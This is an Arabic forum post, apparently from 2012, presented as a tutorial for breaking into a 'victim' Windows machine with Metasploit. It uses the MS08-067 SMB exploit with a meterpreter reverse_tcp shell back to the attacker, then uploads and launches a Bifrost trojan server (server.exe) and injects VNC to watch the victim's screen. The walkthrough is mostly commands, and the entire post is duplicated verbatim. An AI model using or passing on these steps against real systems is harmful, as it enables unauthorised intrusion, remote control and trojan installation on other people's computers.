rss
07-09-2012, 06:30 AM
http://img52.imageshack.us/img52/6807/21948207.png
http://img513.imageshack.us/img513/3483/21425574.png
الحمد لله الذي يقول الحق وهو يهدي السبيل ، والصلاة والسلام على نبينا
محمد خاتم النبيين وإمام المرسلين ، جدد الله به رسالة السماء ، وأحيا ببعثته سنة
الأنبياء ، ونشر بدعوته آيات الهداية ، وأتم به مكارم الأخلاق وعلى آله وأصحابه ،
الذين فقههم الله في دينه ، فدعوا إلى سبيل ربهم بالحكمة والموعظة الحسنة ، فهدى
الله بهم العباد ، وفتح على أيديهم البلاد ، وجعلهم أمة يهدون بالحق إلى الحق
http://img513.imageshack.us/img513/3483/21425574.png
طريقة اختراق جهاز الضحية بالميتا ورفع سيرفر بيفروست
وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
تم تطبيق الشرح على جهاز افتراضي
الشرح
http://img513.imageshack.us/img513/3483/21425574.png
http://img194.imageshack.us/img194/9891/20090702183620.png
إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits
http://img27.imageshack.us/img27/5264/exploitscmd3.png
ونختار windows/smb/ms08_067_netapi
show payloads
http://img25.imageshack.us/img25/3329/payloads.png
ونختار windows/meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
http://img16.imageshack.us/img16/7027/setexploit5.png
والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
http://img139.imageshack.us/img139/4131/launchexploit6.png
كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
**************************************************
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3
http://img200.imageshack.us/img200/998/uploadserver6.png
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح
http://img37.imageshack.us/img37/6270/73006251.png
لتشغيل السيرفر start server.exe
*******************************************
وكما توضح الصورة نجاح تحميل السيرفر
http://img213.imageshack.us/img213/9439/70700213.png
والصور تعبر عن نفسها
http://img190.imageshack.us/img190/6250/30769969.png
شاشة الضحية
http://img197.imageshack.us/img197/482/55987753.png
لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية
http://img269.imageshack.us/img269/1700/11vncinject.png
وفي الاخير ارجو ان ينال الشرح اعجابكم
ولا تنسى لي ب الدعاء
http://www.alamuae.com/gallery/data/media/123/0465.gif
http://img513.imageshack.us/img513/3483/21425574.png
الحمد لله الذي يقول الحق وهو يهدي السبيل ، والصلاة والسلام على نبينا
محمد خاتم النبيين وإمام المرسلين ، جدد الله به رسالة السماء ، وأحيا ببعثته سنة
الأنبياء ، ونشر بدعوته آيات الهداية ، وأتم به مكارم الأخلاق وعلى آله وأصحابه ،
الذين فقههم الله في دينه ، فدعوا إلى سبيل ربهم بالحكمة والموعظة الحسنة ، فهدى
الله بهم العباد ، وفتح على أيديهم البلاد ، وجعلهم أمة يهدون بالحق إلى الحق
http://img513.imageshack.us/img513/3483/21425574.png
طريقة اختراق جهاز الضحية بالميتا ورفع سيرفر بيفروست
وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
تم تطبيق الشرح على جهاز افتراضي
الشرح
http://img513.imageshack.us/img513/3483/21425574.png
http://img194.imageshack.us/img194/9891/20090702183620.png
إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits
http://img27.imageshack.us/img27/5264/exploitscmd3.png
ونختار windows/smb/ms08_067_netapi
show payloads
http://img25.imageshack.us/img25/3329/payloads.png
ونختار windows/meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
http://img16.imageshack.us/img16/7027/setexploit5.png
والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
http://img139.imageshack.us/img139/4131/launchexploit6.png
كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
**************************************************
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3
http://img200.imageshack.us/img200/998/uploadserver6.png
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح
http://img37.imageshack.us/img37/6270/73006251.png
لتشغيل السيرفر start server.exe
*******************************************
وكما توضح الصورة نجاح تحميل السيرفر
http://img213.imageshack.us/img213/9439/70700213.png
والصور تعبر عن نفسها
http://img190.imageshack.us/img190/6250/30769969.png
شاشة الضحية
http://img197.imageshack.us/img197/482/55987753.png
لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية
http://img269.imageshack.us/img269/1700/11vncinject.png
وفي الاخير ارجو ان ينال الشرح اعجابكم
ولا تنسى لي ب الدعاء
http://www.alamuae.com/gallery/data/media/123/0465.gif